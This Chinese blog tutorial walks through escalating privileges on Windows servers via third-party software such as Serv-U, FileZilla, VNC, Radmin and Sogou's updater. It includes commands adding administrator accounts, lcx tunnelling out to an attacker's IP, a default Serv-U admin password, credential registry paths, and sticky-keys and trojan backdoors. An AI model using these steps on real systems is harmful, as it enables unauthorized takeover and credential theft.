windows中常见提权方式总结(三)
Contents
提权之第三方软件提权总结
前言
此文主要记录一些通过第三方软件提权的方式,主要包括一些ftp管理软件,远程管理软件等等。。。
第三方软件serv-u提权
serv-u简介
- Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
- serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
- serv-u密码文件:ServUDaemon.ini
- 端口号:默认端口是43958
ServUDaemon.ini中lccalsetuportNo=端口
FTP提权方法
1、有修改权限
2、无权限修改
3、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)
4、serv-u ftp转发端口
有修改权限
步骤如下:
1、判断是否安装serv-u
nmap扫端口确认
2、检查是否有可写权限
一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini
3、在serv-u中添加用户
在user4=添加一个系统用户
1 | [USER=quan|1] //用户名 |
password=2位随机字符+md5(2位随机字符+123456)
4、连接目标FTP服务器
1 | ftp 目标IP地址 刚添加的用户密码 |
5、利用ftp命令quote site exec添加用户加入administrators权限组
1 | quote site exec net user quan quan123 /add |
无修改权限
1、利用md5 直接去解密
2、默认用户名密码
账户:LocalAdministrator ,密码:#l@$ak#.lk;0@P
命令:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add
3、不是默认密码时
直接把SerUAdmin.exe 下载下来
用winhex打开查找LocalAdministrator(选择ANSI字符)进行查找密码
serv-u ftp本地溢出权限提升(使用6.0以及以前版本)
步骤如下:
1、用Serv-U提权综合工具生成提权工具serv_u.exe
2、先上传 serv_u.exe 到一个盘符下
比如是d盘
3、执行命令
1 | d:\serv_u.exe |
注意命令要有引号
serv-u ftp转发端口
1、lcx端口转发
在目标Webshell上运行LCX命令
1 | lcx -slave yourIP 5000 127.0.0.1 43958 |
在本机上运行
1 | lcx -listen 5000 21 |
2、本机登陆Serv_U
打开本地的SERV_U 在IP上填入127.0.0.1
帐号写LocalAdministrator 密码#l@$ak#.lk;0@P
详情参考:https://blog.csdn.net/God_XiangYu/article/details/99692269
这里就不写具体过程了
第三方软件G6-FTP提权
G6-FTP简介
- G6 FTP Server 新一代的 FTP 服务器端软件,支持 RFC-959 标准并增强其中的某些功能,上传和下载都可以续传,实时查看运行状态,占用带宽,还有很多功能。
- G6-FTP的默认端口为
8021,只侦听在127.0.0.1的8021端口上,所以无法从外部直接访问,需要进行端口转发(使用lcx 工具(lcx 具有三个功能:监听、转发、端口转向))。
提权关键
使用lcx时必须保证两个前提,肉鸡A和内网机C都能够访问到外网机B;listen监听的端口之前不能被其它程序占用。
提取方法
1、通过执行bat文件提权
2、通过映射bat文件提权
通过执行bat文件提权
步骤如下
下载配置文件
Remote.ini,将administrator管理密码解密
用cmd5 破解查找该网站的可读可写目录,然后上传
cmd.exe和lcx.exe到该目录下利用
lcx端口转发 默认只允许本机连接
1 | lcx.exe -tran 8027 127.0.0.1 8021 |
以管理员用户登录服务端
转发成功后,通过G6-FTP软件进行连接,以管理员用户登入创建FTP用户并进行权限设置
上传批处理文件
adduser.bat中的文件内容为:即新建一个用户名为quan的用户,并且加入到管理员组中。
1 | net user quan quan123 /add |
在G6-FTP软件中加入批处理命令
site commands-> +
Command:ADDUSER
Excute:普通用户登录ftp
执行所加入的批处理命令
执行命令quote site adduser.bat
通过执行bat文件提权
可用性较差
步骤如下
1、以非特权用户登录
2、通过添加FTP用户账户hhh
3、对FTP服务器添加新的site命令
4、新建a.bat文件
1 | net user quan quan123 /add |
5、将a.bat文件映射到新建的site命令
6、获取system权限
以test用户登录ftp服务器,执行以下命令
ftp>quote site a
第三方软件FileZilla提权
FileZilla简介
- FileZilla是一个免费开源的FTP软件,分为客户端版本和服务器版本,具备所有的FTP软件功能。
- FileZilla的默认端口为
14147,只侦听在127.0.0.1的14147端口上,所以无法从外部直接访问,需要进行端口转发(使用lcx 工具(lcx 具有三个功能:监听、转发、端口转向))。默认安装目录下有两个敏感文件filezillaserver.xml(包含用户信息)和filezillaserverinterface.xml(包含管理信息)
提权步骤
1、下载这两个文件,拿到管理密码
2、查找该网站的可读可写目录,然后上传cmd.exe和lcx.exe到该目录下
3、利用lcx端口转发 默认只允许本机连接
1 | lcx.exe -tran 14148 127.0.0.1 14147 |
4、以管理员用户远程登录服务端程序
转发成功后,通过FileZilla软件进行连接,以管理员用户登入
端口为14148,密码默认为空
5、创建ftp用户并进行权限设置
赋予C盘读写权限
6、用刚创建的用户通过FileZilla的客户端登录ftp
7、使用cmd.exe改名为sethc.exe替换C:\Windows\System32\sethc.exe生成shift后门
8、远程登录3389,按5次shift调出cmd.exe
9、添加一个用户,并将其提升为管理员权限
1 | net user quan 123 /add |
补充:
FTP分为主动连接和被动连接,Filezilla的21端口是不能被转发出来的,将21端口转发出来以后,被动连接就会变成主动连接,Filezilla是不支持主动连接的。将21端口转发出来以后就会发生积极拒绝的情况。
2008系统权限比2003严格一点,导致系统文件是不能修改和删除重命名,这里是没有办法利用 。如果遇到不能提权的时候,可以使用如下几种提权思路。
扩展知识:
- 通过FTP去篡改他桌面上快捷方式,路径指向给修改到我们的恶意程序。(比较被动)不推荐
- 上传利用到2008启动项 目录里,c:/users/administrator/appdata/roaming/microsoft/windows/start menu/programs/startup/
- 替换system系统服务程序,进行提权。
第三方软件FlashFXP提权
1、FlashFXP简介
- FlashFXP是一款功能强大的FXP/FTP软件,集成了其它优秀的FTP软件的优点,如CuteFTP的目录比较,支持彩色文字显示;如BpFTP支持多目录选择文件,暂存目录;又如LeapFTP的界面设计。
2、提权思路
利用FlashFXP替换文件漏洞,可以读取管理员链接过的站点账号密码。
3、提权步骤
(1)下载quick.dat这个文件
链接的账号密码都保存在quick.dat
falshfxp默认安装目录:C:\Program Files\flashfxp
(2)本地覆盖
打开我们本机的FlashFTP把原先的文件替换掉
(3)获取网站管理密码
打开本机软件,查看历史记录,可以看到受害者主机quick.dat 文件里的服务器、用户名、密码等信息。
如果想要获取密码,可下载星号密码查看工具查看暗文
第三方软件pcAnywhere提权
1、pcAnywhere简介
- PcAnywhere是一款远程控制软件,你可以将你的电脑当成主控端去控制远方另一台同样安装有pcANYWHERE的电脑(被控端),你可以使用被控端电脑上的程序或在主控端与被控端之间互传文件。
- pcAnywher的默认端口为
5631、5632。 - pcAnywher的账户和密码保存在一个后缀为
.cif的配置文件中,可能是PCA.serven.CIF。
2、提权步骤
(1)访问pcAnywhere默认安装目录,查找cif文件并下载
默认路径: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts
1 | dir *.cif/s |
(2)利用破解工具pcAnywherePWD对cif文件直接进行破解
(3)连接pcAnywhere服务端
拿到用户密码后使用客户端连接对pcAnywhere服务端进行连接,之后就和对本地计算机进行操作一样。
详情参考:https://blog.csdn.net/God_XiangYu/article/details/99699638
第三方软件VNC提权
VNC简介
VNC (Virtual Network Console)是虚拟网络控制台的缩写。它 是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。
提权思路
安装VNC后会在注册表中保留VNC的密码,通过WEBSHELL远程读取注册表中的密码信息并在本地破解VNC密码进行远程连接来达到提权目的。
提权步骤
1、通过读取注册表十进制数
(1)RealVNC的注册表路径:
1 | HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password |
(2)UltraVNC的注册表路径:
1 | HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password |
2、转换成十六进制数
在线转换进制地址链接:https://www.toolfk.com/tool-convert-hexadecimal
3、破解十六进制数得到密码
使用工具VNC4X进行破解
先在CMD输入vncx4.exe -W回车
然后将转换后的十六进制挨个输入,每输入一个都按一次回车
4、使用获取到的账号密码连接vnc
通过本地的VNC客户端,连接成功后远程操作实现提权
详情参考:https://blog.csdn.net/God_XiangYu/article/details/99711913
第三方软件Radmin提权
Radmin简介
- Radmin是平时在windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等特性。
- 默认开放
4899端口 - Radmin server2.X、Radmin server3.0都存在一个“致命”漏洞 —— radmin hash提权漏洞
提权思路
老版本的Radmin会在注册表中保留密码的Hash值,通过WEBSHELL、远程挂马读取注册表中的密码Hash值并在本地破解密码进行远程连接来达到提权目的。
提取步骤
1、获取MD5Hash值
1 | HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParametersParameter//默认密码注册表位置 |
2、使用RadminHash进行登录
在Radmin-Hash客户端输入RAdmin客户端的Hash值即可登录。
然后在Radmin-Hash客户端新建服务端,输入所要连接的IP或者扫描存活主机进行连接
3、查看远程屏幕
在Radmin客户端选择屏幕控制,输入Hash值即可查看远程主机屏幕。
4、获取并破解密码
用mimikatz解析用户密码,也可以通过上传getpw.exe文件获取用户的sam值,再通过LC5解密。
5、登录远程桌面
在本地打开远程桌面连接器,输入远端IP进行登录。
第三方软件搜狗输入法提权
提权简介
搜狗低版本输入法根目录下有一个:PinyinUp.exe是用来更新词典用的,管理员为了保存词库,有可能会把搜狗输入法安装到D盘,搜狗输入法目录默认是Everyone可读可写,搜狗每隔一段时间就会自动升级,而升级的文件是PinyinUp.exe,
由于搜狗输入法默认设置是自动更新,更新程序没有对exe做任何校验直接在输入法升级时调用运行,导致可以执行恶意代码。
提权步骤
我们只要把这个文件替换为自己的远控木马,或是添加账户的批处理,等搜狗升级的时候,就可以达成我们的目的了。搜狗拼音输入法,会定时调用这个文件进行升级,用户无法禁止。
(很老的一个漏洞了,现在应该这种情况应该也很少见了。。。。。)
参考文章
https://cloud.tencent.com/developer/article/1547098